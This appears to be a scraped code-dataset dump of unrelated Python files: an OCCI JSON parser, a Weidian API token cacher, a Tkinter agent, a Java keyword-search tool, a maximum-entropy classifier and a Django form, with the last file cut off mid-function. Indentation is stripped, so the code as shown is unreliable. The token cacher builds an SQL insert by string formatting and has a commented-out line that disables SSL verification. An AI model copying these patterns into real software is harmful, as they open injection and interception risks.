@author: Bilel Msekni
@contact: [email protected]
@author: Houssem Medhioub
@contact: [email protected]
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
try:
import simplejson as json
except ImportError:
import json
def extract_term_from_category(json_object):
"""
returns the term from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('term'):
return json_object['term']
else:
return None
def extract_scheme_from_category(json_object):
"""
returns the scheme from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('scheme'):
return json_object['scheme']
else:
return None
def extract_location_from_category(json_object):
"""
returns the location from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('location'):
return json_object['location']
else:
return None
def extract_title_from_category(json_object):
"""
returns the title from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('title'):
return json_object['title']
else:
return None
def extract_related_from_category(json_object):
"""
returns the related from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('related'):
items = json_object['related']
rel = ""
for item in items:
rel += item + ","
rel = rel[:-1]
else:
rel = None
return rel
def extract_actions_from_category(json_object):
"""
returns the actions from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('actions'):
items = json_object['actions']
actions = ""
for item in items:
actions += item + ","
actions = actions[:-1]
else:
actions = None
return actions
def extract_attributes_from_category(json_object):
"""
returns the attributes from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('attributes'):
items = json_object['attributes']
attributes = recursive_for_attribute(items)
htt_att = ""
for att in attributes:
htt_att += att + ","
attributes = htt_att[:-1]
else:
attributes = None
return attributes
def extract_kind_from_entity(json_object):
"""
returns the HTTP kind description extracted from a json entity representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('kind'):
kind_id = json_object['kind']
kind_scheme, kind_term = kind_id.split('#')
return kind_term + "; scheme=\"" + kind_scheme + "\"; class=\"kind\";"
else:
return None
def extract_mixin_from_entity(json_object):
"""
returns mixins of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('mixin'):
mix_http = list()
mixins = json_object['mixin']
for item in mixins:
mix_scheme, mix_term = item.split('#')
mix_http.append(mix_term + "; scheme=\"" + mix_scheme + "\"; class=\"mixin\";")
return mix_http
else:
return None
def extract_id_from_entity(json_object):
"""
returns id of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('id'):
return json_object['id']
else:
return None
def extract_title_from_entity(json_object):
"""
returns title of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('title'):
return json_object['title']
else:
return None
def extract_actions_from_entity(json_object):
"""
returns actions of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('actions'):
items = json_object['actions']
actions = list()
for item in items:
actions.append("<" + item['href'] + ">; rel=\"" + item['category'] + "\"")
return actions
else:
return None
def extract_internal_link_from_entity(json_object):
"""
returns internal links of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('links'):
items = json_object['links']
links = list()
for item in items:
uri = "|zizi|"
rel = "|zala|"
category = item['kind']
self = "|zolo|"
link = "<" + uri + ">; rel=\"" + rel + "\"; self=\"" + self + "\"; category=\"" + category + "\";"
if item.has_key('attributes'):
attributes = recursive_for_attribute_v2(item['attributes'])
for att in attributes:
link += att[:-1] + ";"
links.append(link)
return links
else:
return None
def extract_attributes_from_entity(json_object):
"""
returns the attributes from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('attributes'):
items = json_object['attributes']
attributes = recursive_for_attribute_v2(items)
return attributes
else:
return None
def treat_attribute_members(members):
to_return = ""
for key in members.keys():
if key == "mutable":
if members[key] is True:
to_return += ""
else:
to_return += "{immutable}"
elif key == "required":
if members[key] is True:
to_return += "{required}"
else:
to_return += ""
else:
pass
return [to_return]
def recursive_for_attribute(attributes):
"""
"""
att_http = list()
for key in attributes.keys():
if type(attributes[key]) is dict:
items = recursive_for_attribute(attributes[key])
for item in items:
if not (item.find('{')):
att_http.append(key + item)
else:
att_http.append(key + "." + item)
else:
attributes = treat_attribute_members(attributes)
return attributes
final_att = list()
for item in att_http:
if item.endswith('.'):
final_att.append(item[:-1])
else:
final_att.append(item)
return final_att
def treat_attribute_members_v2(attributes):
to_return = list()
for key in attributes.keys():
to_return.append(key + "=\"" + str(attributes[key]) + "\"")
return to_return
def recursive_for_attribute_v2(attributes):
"""
"""
att_http = list()
for key in attributes.keys():
if type(attributes[key]) is dict:
items = recursive_for_attribute_v2(attributes[key])
for item in items:
att_http.append(key + "." + item)
else:
attributes = treat_attribute_members_v2(attributes)
return attributes
return att_http
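# Illustrative behaviour (editor's note; the attribute names are hypothetical):
#   recursive_for_attribute_v2({'occi': {'compute': {'cores': 2}}})
#       -> ['occi.compute.cores="2"']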
if __name__ == '__main__':
print '====== Test ======'
att = """
{
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 2
}
},
"org": {
"other": {
"occi": {
"my_mixin": {
"my_attribute": "my_value"
}
}
}
}
}
"""
attold = """
{"occi": {
"compute": {
"hostname": {
"mutable": true,
"required": false,
"type": "string",
"pattern": "(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\\\-]*[a-zA-Z0-9])\\\\.)*",
"minimum": "1",
"maximum": "255"
},
"state": {
"mutable": false,
"required": false,
"type": "string",
"pattern": "inactive|active|suspended|failed",
"default": "inactive"
}
}
}}
"""
att_obj = json.loads(att)
res = recursive_for_attribute_v2(att_obj)
# json_mixin = json.loads(mixin)
# res = convert_json_action_to_http_action(json_mixin)
print res
| apache-2.0 | 8,804,081,542,698,351,000 | 24.793388 | 110 | 0.550785 | false | 4.030564 | false | false | false |
AsherYang/ThreeLine | server/shserver/GetToken.py | 1 | 4145 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Author: AsherYang
Email: [email protected]
Date: 2017/7/24
Desc: get weidian token
@see https://wiki.open.weidian.com/guide#145
https://oauth.open.weidian.com/token?grant_type=client_credential&appkey=xxx&secret=xxx
The token request must be made with HTTP GET.
"""
import json
import time
import DbUtil
import OpenRequest
import TokenConstant
from Token import Token
# import ssl
# get_token_url = "https://oauth.open.weidian.com/token?grant_type=client_credential&appkey=" + TokenConstant.appkey + "&secret=" + TokenConstant.secret
# ssl._create_default_https_context = ssl._create_unverified_context
# Service-type (third-party) app URL
# get_token_url = '%s/oauth2/access_token' % TokenConstant.domain
# Self-use (private) app URL
get_token_url = '%s/token' % TokenConstant.domain
# ====== GET approach used before 2017-09-07: Weidian changed its rules, so the direct request became invalid; the code below mimics browser behaviour instead =========
# def getTokenFromNet():
# # request 封装
# request = urllib2.Request(url=get_token_url)
# # 发起请求
# html = urllib2.urlopen(request)
# response_data = html.read()
# print response_data
# jsonToken = json.loads(response_data)
# access_token = jsonToken['result']['access_token']
# expire_in = jsonToken['result']['expire_in']
# token = Token()
# token.access_token = access_token
# token.expire_in = expire_in
# return token
def getTokenFromNet():
params = {"appkey": TokenConstant.appkey, "secret": TokenConstant.secret, "grant_type": "client_credential"}
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
}
body = OpenRequest.http_get(get_token_url, params=params, header=header)
print body
jsonToken = json.loads(body)
access_token = jsonToken['result']['access_token']
expire_in = jsonToken['result']['expire_in']
token = Token()
token.access_token = access_token
token.expire_in = expire_in
return token
# ====== get token from db ========
def getTokenFromDb():
query = "select * from sh_token where update_time = (select max(update_time) from sh_token)"
token = Token()
results = DbUtil.query(query)
# print results
if results is None:
return None
for row in results:
row_id = row[0]
access_token = row[1]
expire_in = row[2]
update_time = row[3]
token.access_token = access_token
token.expire_in = expire_in
token.update_time = update_time
# print "row_id = %s, access_token = %s, expire_in = %s, update_time = %s " %(row_id, access_token, expire_in, update_time)
return token
# ====== save token to db =======
def saveToDb(token=None, expire_in=None):
if token is None or expire_in is None:
print "token is %s, expire_in is %s" % (token, expire_in)
return
else:
# locattime = time.asctime(time.localtime(time.time()))
# current_milli_time = lambda: int(round(time.time() * 1000))
# print locattime
# print current_milli_time()
locattime = int(time.time())
insert = 'insert into sh_token (access_token, expire_in, update_time) values("%s", "%s", "%s")' %(token, expire_in, locattime)
DbUtil.insert(insert)
def doGetToken():
dbToken = getTokenFromDb()
currentTime = int(time.time())
if dbToken is None:
netToken = getTokenFromNet()
saveToDb(netToken.access_token, netToken.expire_in)
print "ok , update token from net success, when dbToken is null. "
return netToken.access_token
if currentTime >= int(dbToken.update_time) + int(dbToken.expire_in):
print "currentTime = %s , update_time = %s " % (currentTime, dbToken.update_time)
# expired
netToken = getTokenFromNet()
saveToDb(netToken.access_token, netToken.expire_in)
print "ok , update token from net success. "
return netToken.access_token
else:
print "ok , token in date. "
return dbToken.access_token
if __name__ == '__main__':
doGetToken()
| apache-2.0 | 7,821,242,104,657,829,000 | 32.641667 | 152 | 0.642061 | false | 3.098235 | false | false | false |
davidko/evolspyse | core/agents/tkagent.py | 2 | 1603 | """Spyse Tkinter UI agent module"""
from spyse.core.agents.ui import UIAgent
from spyse.core.content.content import ACLMessage
from Tkinter import *
class TkinterAgent(UIAgent):
"""A Tkinter UI agent"""
# http://www.python.org/topics/tkinter/
# the next two lines of code need to be commented out for epydoc to work
__root = Tk()
__root.withdraw()
def __init__(self, name, mts, **namedargs):
super(TkinterAgent, self).__init__(name, mts, **namedargs)
#self.__root = Tk()
# if not hasattr(self, '__root'):
# self.__root = Tk()
# self.__root.title("Root")
#self.__root.withdraw() # won't need this
#self.__root.mainloop()
# setattr(self, '__root', Tk())
self.top = Toplevel(self.__root)
self.top.title(name)
#self.top.protocol("WM_DELETE_WINDOW", self.top.destroy)
self.create_widgets(self.top)
def make_Tk(root):
root.title("Spyse Agent Management System")
title_label = Label(root)
title_label["text"]="Spyse - Agent Management System"
title_label.pack()
quit_button = Button(root, command=quit) # doesn't work
quit_button["text"]="Quit"
quit_button.pack()
#root.withdraw()
def create_widgets(self, frame):
# Override
pass
def take_down(self):
print "destroying toplevel"
#self.top.destroy()
# TODO: is there a better way to kill windows ???
@classmethod
def run_GUI(cls):
cls.__root.mainloop()
# run_GUI = classmethod(run_GUI)
| lgpl-2.1 | -5,265,511,297,091,729,000 | 28.685185 | 76 | 0.588272 | false | 3.61036 | false | false | false |
TUBAME/migration-tool | src/tubame.portability/resources/tubame-search-modules/src/migration/jbmst_search_java.py | 2 | 11779 | # -*- coding: utf-8 -*-
"""
jbmst_search_java.py
Created on 2013/06/28
Copyright (C) 2011-2013 Nippon Telegraph and Telephone Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
Java search process.
Searches Java source files; comment text is excluded from the search.
If only Search Keyword1 is given, the lines matching Search Keyword1 are returned.
If Search Keyword2 is also present, the file is searched again with Search Keyword2
and those results are returned.
[Environment] Python 2.7
"""
import re, sys,os
SINGLE_COMMENT = "SINGLE_COMMENT"
MULTI_COMMENT = "MULTI_COMMENT"
MULTI_COMMENT_END = "MULTI_COMMENT_END"
JAVA_SOURCE = "JAVA_SOURCE"
"""
Check whether a line is a single-line comment, a multi-line comment, or
searchable source, and return a status corresponding to the type of statement.
@param pLine: Line of the file being searched
@return Tuple of (line type, source text with any end-of-line comment stripped, or None)
"""
def isSingleComment(pLine,LINE_HEAD_COMMENT_STR = "//"):
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT =None
m = re.search("^\s*"+LINE_HEAD_COMMENT_STR,pLine)
if m:
return SINGLE_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
#support end of line comment
m = re.search("(\s*\w*)"+LINE_HEAD_COMMENT_STR,pLine)
if m:
m = re.search("[^"+LINE_HEAD_COMMENT_STR+"]*",pLine)
if m != None:
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT = m.group()
m = re.search("^\s*/\*",pLine)
if m:
m = re.search("\*/\s*$",pLine)
if m:
return SINGLE_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
return MULTI_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
#support end of line comment
m = re.search("(\s*\w*)/\*.*\*/$",pLine)
if m:
result = m.group()
if result != None:
index = len(result)
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT =pLine[:-index]
return JAVA_SOURCE,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
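
# Hedged illustration (editor addition): expected classifications with the
# default "//" line-comment marker.
#   isSingleComment("// note")      -> (SINGLE_COMMENT, None)
#   isSingleComment("/* start of")  -> (MULTI_COMMENT, None)
#   isSingleComment("int a = 1;")   -> (JAVA_SOURCE, None)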
"""
Determine whether the given line ends a multi-line comment.
@param pLine: Line of the file being searched
@return MULTI_COMMENT_END if the line closes the comment, otherwise MULTI_COMMENT
"""
def isMultiCommentEnd(pLine):
m = re.search("\*/\s*$",pLine)
if m:
return MULTI_COMMENT_END
return MULTI_COMMENT
"""
This function is currently unused.
@param pSeachKey
@param pLine
@return
"""
def searchByLine(pSeachKey,pLine):
m = re.search(pSeachKey,pLine)
if m:
return "FOUND"
return "NOT_FOUND"
"""
For lines that are not comment text, search for Search Keyword1 or Search Keyword2.
The line numbers of the matching lines are collected into the result list.
@param pSearchFile File to be searched
@param pSearchStr Search Keyword1 or Search Keyword2
@return List of matching line numbers
"""
def search_open_file(pSearchFile,pSearchStr,isFirstMatchExit=False,LINE_HEAD_COMMENT_STR = "//",isSemicolonParser=False,pSearchStr2="",pFlag=0):
current_line_status = "NONE"
line_count = 0
line_count_list = []
searchTargetBody = ""
searchTargetBodyIncludedComment= ""
# Open the search files
f = open(pSearchFile, "r")
for line in f:
searchTargetBodyIncludedComment += line
line_count += 1
# Determine the type of sentence
line_status ,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
# Distributes the processing according to the type of sentence
if ( current_line_status == MULTI_COMMENT):
# If multi-sentence comment
if (isMultiCommentEnd(line) == MULTI_COMMENT_END):
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if (line_status == JAVA_SOURCE):
# If this is not the comment text
                # support end-of-line comments
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
                # Treat everything up to the semicolon as a single token when searching
if isSemicolonParser == True:
searchTargetBody += line
if hasEndSemicolon(searchTargetBody) == True:
find_result = findByKeywords(pSearchStr,pSearchStr2,LINE_HEAD_COMMENT_STR,searchTargetBody,searchTargetBodyIncludedComment.rstrip(),line_count,pFlag)
line_count_list += find_result
searchTargetBodyIncludedComment = ""
searchTargetBody = ""
else:
m = findAll(pSearchStr,line,pFlag)
if m:
for hit in m:
line_count_list.append(line_count)
if isFirstMatchExit == True:
f.close()
return line_count_list
current_line_status = line_status
f.close()
return line_count_list
def findAll(pSearchStr,pLine,pFlag=0):
return re.findall(pSearchStr,pLine,pFlag)
def hasEndSemicolon(pTarget):
if re.search(".*;\s*$",pTarget):
return True
return False
def hasEndBackSlash(pTarget):
    # the backslash itself must be escaped to match a trailing '\'
    if re.search(r".*\\\s*$",pTarget):
return True
return False
# def getIndexBaseEndofLine(body,match):
# print 'body:',body
# tokens = body.split(';')
# if len(tokens) != 0:
# if not match.end() +1 > len(body):
# match_after_line = body[match.end()+1:]
# print 'match_after_line' ,match_after_line
# m = match_after_line.split(';')
# if m:
# return m[0].count('\n')
# else:
# return 0
def getMatch(pSearchStr2,append_line):
    # re.finditer returns an iterator, so materialise it before taking its length
    match = list(re.finditer(pSearchStr2,append_line))
    return len(match),match
def findByKeywords(pSearchStr1,pSearchStr2,LINE_HEAD_COMMENT_STR,pSearchTarget,pSearchTargetIncludedComment,pline_count,pFlag=0):
result_list = []
#print pSearchTarget
#print pSearchStr1
    # Skip processing when the comment-stripped text contains no match at all
m= re.findall(pSearchStr1,pSearchTarget.replace('\n',''),pFlag)
if len(m) == 0:
return result_list
if pSearchStr2 == "":
searchKey =pSearchStr1
else:
searchKey =pSearchStr2
lines = pSearchTargetIncludedComment.split('\n')
line_length = len(lines)
line_count = 0
current_line_status = "NONE"
firstMatch = False
append_line = ""
match_len = 0
for line in lines:
line_count += 1
line_status ,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
if current_line_status == MULTI_COMMENT:
# If multi-sentence comment
if isMultiCommentEnd(line) == MULTI_COMMENT_END:
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if line_status == JAVA_SOURCE:
# If this is not the comment text
                # support end-of-line comments
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
append_line += line
if firstMatch == False:
match = re.finditer(searchKey,append_line,pFlag)
i = 0
for m in match:
result_list.append(pline_count - (line_length -line_count))
i += 1
firstMatch = True
if i !=0:
match_len = i
else:
match = re.finditer(searchKey,append_line,pFlag)
i = 0
for m in match:
if i >= match_len:
result_list.append(pline_count - (line_length -line_count))
i = i + 1
if i > 0:
match_len = i
current_line_status = line_status
return result_list
def searchInterfaceMethod(pSearchFile,LINE_HEAD_COMMENT_STR="//"):
current_line_status = "NONE"
line_count = 0
methodname_list = []
# Open the search files
f = open(pSearchFile, "r")
for line in f:
line_count += 1
# Determine the type of sentence
line_status,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
# Distributes the processing according to the type of sentence
if ( current_line_status == MULTI_COMMENT):
# If multi-sentence comment
if (isMultiCommentEnd(line) == MULTI_COMMENT_END):
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if (line_status == JAVA_SOURCE):
# If this is not the comment text
                # support end-of-line comments
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
m = re.search("^(?!.*\s+(static|new)\s+).*$",line)
if m != None:
m =re.search("\w+\s+(\w+)\s*\(.*",line)
if m:
method_name=m.group(1)
methodname_list.append(method_name)
f.close()
return methodname_list
"""
If only Search Keyword1 is given, returns the results of searching with Search Keyword1.
If Search Keyword2 is also present, the file is searched again with Search Keyword2
and those results are returned.
@param pSearchFile File to be searched
@param pSearchStr1 Search Keyword1
@param pSearchStr2 Search Keyword2
@return List of line numbers that matched the search
"""
def searchByFile(pSearchFile,pSearchStr1,pSearchStr2,isFirstMatchExit=False,LINE_HEAD_COMMENT_STR = "//",IS_SEMICOLON_PARSER=False,FLAG=0):
result_hit_count_list = []
if pSearchStr2 != "" and IS_SEMICOLON_PARSER == True:
        # Only in the SEMICOLON_PARSER case, search directly with the second keyword as-is.
return search_open_file(pSearchFile,pSearchStr1,True,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,pSearchStr2,FLAG)
else:
result_hit_count_list = search_open_file(pSearchFile,pSearchStr1,False,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,"",FLAG)
hit_total_cnt = len(result_hit_count_list)
if hit_total_cnt!= 0 and pSearchStr2 != "":
result_hit_count_list = search_open_file(pSearchFile,pSearchStr2,isFirstMatchExit,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,"",FLAG)
return result_hit_count_list
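
# --- Hedged usage sketch (editor addition; the sample file contents and the
# keyword below are assumptions for illustration, not part of the original tool) ---
def _exampleSearchByFile():
    import tempfile
    sample = ("package demo;\n"
              "// import javax.ejb.EJB; (commented out, must not match)\n"
              "import javax.ejb.EJB;\n"
              "public class Demo {}\n")
    tmp = tempfile.NamedTemporaryFile(suffix=".java", delete=False)
    tmp.write(sample)
    tmp.close()
    # Comment lines are skipped, so only line 3 (the real import) is expected to hit.
    print searchByFile(tmp.name, "import\\s+javax", "")
    os.remove(tmp.name)
# (call _exampleSearchByFile() manually to try it)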
def wrapSearchByFile(param):
try:
return (searchByFile(*param),param[0])
except Exception,e:
raise Exception, '%s , searchTargetFile = %s' % (e,param[0])
def wrapSearchOpenFile(param):
try:
return (search_open_file(*param),param[0])
except Exception,e:
raise Exception, '%s , searchTargetFile = %s' % (e,param[0]) | apache-2.0 | 923,077,001,037,912,300 | 34.650307 | 173 | 0.610188 | false | 3.607886 | false | false | false |
dbmi-pitt/DIKB-Micropublication | scripts/mp-scripts/Bio/MaxEntropy.py | 1 | 9062 | # Copyright 2001 by Jeffrey Chang. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Maximum Entropy code.
Uses Improved Iterative Scaling:
XXX ref
# XXX need to define terminology
"""
import math
from Numeric import *
from Bio import listfns
# XXX typecodes for Numeric
# XXX multiprocessor
MAX_IIS_ITERATIONS = 10000 # Maximum iterations for IIS.
IIS_CONVERGE = 1E-5 # Convergence criteria for IIS.
MAX_NEWTON_ITERATIONS = 100 # Maximum iterations on Newton's method.
NEWTON_CONVERGE = 1E-10 # Convergence criteria for Newton's method.
class MaxEntropy:
"""Holds information for a Maximum Entropy classifier.
Members:
classes List of the possible classes of data.
alphas List of the weights for each feature.
feature_fns List of the feature functions.
"""
def __init__(self):
self.classes = []
self.alphas = []
self.feature_fns = []
def calculate(me, observation):
"""calculate(me, observation) -> list of log probs
Calculate the log of the probability for each class. me is a
MaxEntropy object that has been trained. observation is a vector
representing the observed data. The return value is a list of
unnormalized log probabilities for each class.
"""
scores = []
    # Iterate over the class values themselves so the feature functions are
    # called with the same (observation, class) arguments used during training.
    for klass in me.classes:
lprob = 0.0
for fn, alpha in map(None, me.feature_fns, me.alphas):
lprob += fn(observation, klass) * alpha
scores.append(lprob)
return scores
def classify(me, observation):
"""classify(me, observation) -> class
Classify an observation into a class.
"""
scores = calculate(me, observation)
max_score, klass = scores[0], me.classes[0]
for i in range(1, len(scores)):
if scores[i] > max_score:
max_score, klass = scores[i], me.classes[i]
return klass
def _eval_feature_fn(fn, xs, classes):
"""_eval_feature_fn(fn, xs, classes) -> dict of values
Evaluate a feature function on every instance of the training set
and class. fn is a callback function that takes two parameters: a
training instance and a class. Return a dictionary of (training
set index, class index) -> non-zero value. Values of 0 are not
stored in the dictionary.
"""
values = {}
for i in range(len(xs)):
for j in range(len(classes)):
f = fn(xs[i], classes[j])
if f != 0:
values[(i, j)] = f
return values
def _calc_empirical_expects(xs, ys, classes, features):
"""_calc_empirical_expects(xs, ys, classes, features) -> list of expectations
Calculate the expectation of each function from the data. This is
the constraint for the maximum entropy distribution. Return a
list of expectations, parallel to the list of features.
"""
    # E[f_i] = SUM_x,y P~(x, y) f_i(x, y)
    #        = (1/N) SUM_n f_i(x_n, y_n)   over the training examples
class2index = listfns.itemindex(classes)
ys_i = [class2index[y] for y in ys]
expect = []
N = len(xs)
for feature in features:
s = 0
for i in range(N):
s += feature.get((i, ys_i[i]), 0)
expect.append(float(s) / N)
return expect
def _calc_model_expects(xs, classes, features, alphas):
"""_calc_model_expects(xs, classes, features, alphas) -> list of expectations.
Calculate the expectation of each feature from the model. This is
not used in maximum entropy training, but provides a good function
for debugging.
"""
# SUM_X P(x) SUM_Y P(Y|X) F(X, Y)
# = 1/N SUM_X SUM_Y P(Y|X) F(X, Y)
p_yx = _calc_p_class_given_x(xs, classes, features, alphas)
expects = []
for feature in features:
sum = 0.0
for (i, j), f in feature.items():
sum += p_yx[i][j] * f
expects.append(sum/len(xs))
return expects
def _calc_p_class_given_x(xs, classes, features, alphas):
"""_calc_p_class_given_x(xs, classes, features, alphas) -> matrix
Calculate P(y|x), where y is the class and x is an instance from
the training set. Return a XSxCLASSES matrix of probabilities.
"""
prob_yx = zeros((len(xs), len(classes)), Float32)
# Calculate log P(y, x).
for feature, alpha in map(None, features, alphas):
for (x, y), f in feature.items():
prob_yx[x][y] += alpha * f
# Take an exponent to get P(y, x)
prob_yx = exp(prob_yx)
# Divide out the probability over each class, so we get P(y|x).
for i in range(len(xs)):
z = sum(prob_yx[i])
prob_yx[i] = prob_yx[i] / z
#prob_yx = []
#for i in range(len(xs)):
# z = 0.0 # Normalization factor for this x, over all classes.
# probs = [0.0] * len(classes)
# for j in range(len(classes)):
# log_p = 0.0 # log of the probability of f(x, y)
# for k in range(len(features)):
# log_p += alphas[k] * features[k].get((i, j), 0.0)
# probs[j] = math.exp(log_p)
# z += probs[j]
# # Normalize the probabilities for this x.
# probs = map(lambda x, z=z: x/z, probs)
# prob_yx.append(probs)
return prob_yx
def _calc_f_sharp(N, nclasses, features):
"""_calc_f_sharp(N, nclasses, features) -> matrix of f sharp values."""
# f#(x, y) = SUM_i feature(x, y)
f_sharp = zeros((N, nclasses))
for feature in features:
for (i, j), f in feature.items():
f_sharp[i][j] += f
return f_sharp
def _iis_solve_delta(N, feature, f_sharp, empirical, prob_yx):
# Solve delta using Newton's method for:
# SUM_x P(x) * SUM_c P(c|x) f_i(x, c) e^[delta_i * f#(x, c)] = 0
delta = 0.0
iters = 0
while iters < MAX_NEWTON_ITERATIONS: # iterate for Newton's method
f_newton = df_newton = 0.0 # evaluate the function and derivative
for (i, j), f in feature.items():
prod = prob_yx[i][j] * f * math.exp(delta * f_sharp[i][j])
f_newton += prod
df_newton += prod * f_sharp[i][j]
f_newton, df_newton = empirical - f_newton / N, -df_newton / N
ratio = f_newton / df_newton
delta -= ratio
if math.fabs(ratio) < NEWTON_CONVERGE: # converged
break
iters = iters + 1
else:
        raise RuntimeError("Newton's method did not converge")
return delta
def _train_iis(xs, classes, features, f_sharp, alphas, e_empirical):
# Do one iteration of hill climbing to find better alphas.
# This is a good function to parallelize.
# Pre-calculate P(y|x)
p_yx = _calc_p_class_given_x(xs, classes, features, alphas)
N = len(xs)
newalphas = alphas[:]
for i in range(len(alphas)):
delta = _iis_solve_delta(N, features[i], f_sharp, e_empirical[i], p_yx)
newalphas[i] += delta
return newalphas
def train(training_set, results, feature_fns, update_fn=None):
"""train(training_set, results, feature_fns[, update_fn]) -> MaxEntropy object
Train a maximum entropy classifier on a training set.
training_set is a list of observations. results is a list of the
class assignments for each observation. feature_fns is a list of
the features. These are callback functions that take an
observation and class and return a 1 or 0. update_fn is a
callback function that's called at each training iteration. It is
passed a MaxEntropy object that encapsulates the current state of
the training.
"""
if not len(training_set):
raise ValueError, "No data in the training set."
if len(training_set) != len(results):
raise ValueError, "training_set and results should be parallel lists."
# Rename variables for convenience.
xs, ys = training_set, results
# Get a list of all the classes that need to be trained.
classes = listfns.items(results)
classes.sort()
# Cache values for all features.
features = [_eval_feature_fn(fn, training_set, classes)
for fn in feature_fns]
# Cache values for f#.
f_sharp = _calc_f_sharp(len(training_set), len(classes), features)
# Pre-calculate the empirical expectations of the features.
e_empirical = _calc_empirical_expects(xs, ys, classes, features)
# Now train the alpha parameters to weigh each feature.
alphas = [0.0] * len(features)
iters = 0
while iters < MAX_IIS_ITERATIONS:
nalphas = _train_iis(xs, classes, features, f_sharp,
alphas, e_empirical)
diff = map(lambda x, y: math.fabs(x-y), alphas, nalphas)
diff = reduce(lambda x, y: x+y, diff, 0)
alphas = nalphas
me = MaxEntropy()
me.alphas, me.classes, me.feature_fns = alphas, classes, feature_fns
if update_fn is not None:
update_fn(me)
if diff < IIS_CONVERGE: # converged
break
else:
        raise RuntimeError("IIS did not converge")
return me
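
# --- Hedged usage sketch (editor addition; the toy data and feature functions
# below are invented for illustration and are not part of Biopython) ---
def _toy_example():
    xs = [(1,), (1,), (1,), (0,), (0,), (0,)]   # observations
    ys = ['A', 'A', 'B', 'B', 'B', 'A']         # class labels
    # Feature functions take (observation, class) and return 0 or 1.
    def indicator_A(x, y):
        return int(x[0] == 1 and y == 'A')
    def indicator_B(x, y):
        return int(x[0] == 0 and y == 'B')
    me = train(xs, ys, [indicator_A, indicator_B])
    # Observations with x[0] == 1 should now be classified as 'A'.
    print classify(me, (1,))
# (call _toy_example() manually to try it)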
| apache-2.0 | -3,662,323,723,767,325,700 | 33.067669 | 82 | 0.614875 | false | 3.420914 | false | false | false |
michaelbratsch/bwb | staff/forms.py | 2 | 8911 | from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit, Layout, Field, Div
from django import forms
from django.core.exceptions import ValidationError
from django.shortcuts import get_object_or_404
from django.utils.formats import date_format
from django.utils.translation import ugettext_lazy
from register.forms import SelectDateOfBirthWidget, MULTIPLE_REGISTRATION_ERROR
from register.models import Bicycle, Candidate
class CreateCandidateForm(forms.ModelForm):
class Meta:
model = Candidate
fields = ('first_name', 'last_name', 'date_of_birth')
labels = {'first_name': ugettext_lazy('First name'),
'last_name': ugettext_lazy('Last name'),
'date_of_birth': ugettext_lazy('Date of birth')}
widgets = {'date_of_birth': SelectDateOfBirthWidget}
def __init__(self, *args, **kwargs):
super(CreateCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(Div(Div(Field('first_name'),
Field('last_name'),
Field('date_of_birth'),
css_class="col-xs-12 col-md-8"),
css_class="form-group row"))
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
def clean(self):
cleaned_data = super(CreateCandidateForm, self).clean()
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
date_of_birth = cleaned_data.get('date_of_birth')
if Candidate.get_matching(first_name=first_name,
last_name=last_name,
date_of_birth=date_of_birth):
raise ValidationError(MULTIPLE_REGISTRATION_ERROR)
return cleaned_data
def get_hidden_field(name, var):
def trunk(var):
if var:
return var
return ""
